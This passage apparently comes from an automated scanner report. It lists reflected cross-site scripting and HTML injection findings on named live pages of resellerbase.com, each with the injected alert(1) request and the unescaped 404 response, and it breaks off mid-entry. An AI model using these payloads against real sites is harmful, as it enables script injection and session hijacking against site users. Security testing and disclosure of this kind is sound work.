Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos7d5f6<script>alert(1)</script>df3745797cf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.378. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15eb5<script>alert(1)</script>7ae7aab5b50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images15eb5<script>alert(1)</script>7ae7aab5b50/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images15eb5<script>alert(1)</script>7ae7aab5b50/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.379. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 36afc<script>alert(1)</script>0ae68875371 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating36afc<script>alert(1)</script>0ae68875371/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating36afc<script>alert(1)</script>0ae68875371/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.380. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 37f93<script>alert(1)</script>3cd2de9f595 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/search.php37f93<script>alert(1)</script>3cd2de9f595?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php37f93<script>alert(1)</script>3cd2de9f595?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.381. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7da82<a>d417c458cde was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7da82<a>d417c458cde&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7da82<a>d417c458cde&opt=2 was not found on this server.</p>
...[SNIP]...

2.382. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7e92e<a>d91d410511 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...7e92e<a>d91d410511&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...7e92e<a>d91d410511&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.383. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2fa1d<script>alert(1)</script>1ebb0f096e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2fa1d<script>alert(1)</script>1ebb0f096e8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2fa1d<script>alert(1)</script>1ebb0f096e8=1 was not found on this server.</p>
...[SNIP]...

2.384. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b7a79<a>0b7bf14024a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b7a79<a>0b7bf14024a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b7a79<a>0b7bf14024a was not found on this server.</p>
...[SNIP]...

2.385. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a7de<script>alert(1)</script>bfa801f502d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult4a7de<script>alert(1)</script>bfa801f502d/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult4a7de<script>alert(1)</script>bfa801f502d/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.386. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 95f50<script>alert(1)</script>dda8e7abf8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes95f50<script>alert(1)</script>dda8e7abf8a/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes95f50<script>alert(1)</script>dda8e7abf8a/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.387. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d549<script>alert(1)</script>c6de83bfec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos6d549<script>alert(1)</script>c6de83bfec9/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos6d549<script>alert(1)</script>c6de83bfec9/images/review/ was not found on this server.</p>
...[SNIP]...

2.388. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24da4<script>alert(1)</script>d54d62721ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images24da4<script>alert(1)</script>d54d62721ec/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images24da4<script>alert(1)</script>d54d62721ec/review/ was not found on this server.</p>
...[SNIP]...

2.389. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 880ce<script>alert(1)</script>b3d649fde8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review880ce<script>alert(1)</script>b3d649fde8e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review880ce<script>alert(1)</script>b3d649fde8e/ was not found on this server.</p>
...[SNIP]...

2.390. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c969e<script>alert(1)</script>1d77e092bbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/?c969e<script>alert(1)</script>1d77e092bbb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/?c969e<script>alert(1)</script>1d77e092bbb=1 was not found on this server.</p>
...[SNIP]...

2.391. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3967d<script>alert(1)</script>be15945341e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult3967d<script>alert(1)</script>be15945341e/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult3967d<script>alert(1)</script>be15945341e/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.392. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c0f0<script>alert(1)</script>e6ae068f294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes9c0f0<script>alert(1)</script>e6ae068f294/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes9c0f0<script>alert(1)</script>e6ae068f294/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.393. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f657d<script>alert(1)</script>3de3c6f99e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosf657d<script>alert(1)</script>3de3c6f99e2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosf657d<script>alert(1)</script>3de3c6f99e2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.394. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45c19<script>alert(1)</script>de1f5ad490b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images45c19<script>alert(1)</script>de1f5ad490b/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images45c19<script>alert(1)</script>de1f5ad490b/review/0.gif was not found on this server.</p>
...[SNIP]...

2.395. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6b2e3<script>alert(1)</script>a25fcbb819e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review6b2e3<script>alert(1)</script>a25fcbb819e/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review6b2e3<script>alert(1)</script>a25fcbb819e/0.gif was not found on this server.</p>
...[SNIP]...

2.396. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f1ab5<script>alert(1)</script>725cebe871e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

